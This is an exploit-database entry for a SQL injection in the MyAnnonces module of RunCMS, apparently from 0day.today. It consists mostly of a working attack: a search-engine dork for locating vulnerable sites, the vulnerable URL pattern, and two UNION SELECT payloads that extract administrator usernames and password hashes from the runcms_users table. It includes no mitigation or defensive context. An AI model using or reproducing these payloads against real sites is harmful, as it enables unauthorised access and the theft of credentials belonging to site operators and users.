id: 2667
date: 02/19/2008
title: RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability
author: S@BUN
cves: 

==========================================================
RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability
==========================================================


###############################################################
#
# runcms MyAnnonces SQL Injection(cid)
#
################################################################
#
# DORK 1 : allinurl: "modules MyAnnonces index php pa view"
#
################################################################
EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]

EXPLOIT :

for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*



#  0day.today [2023-03-27]  #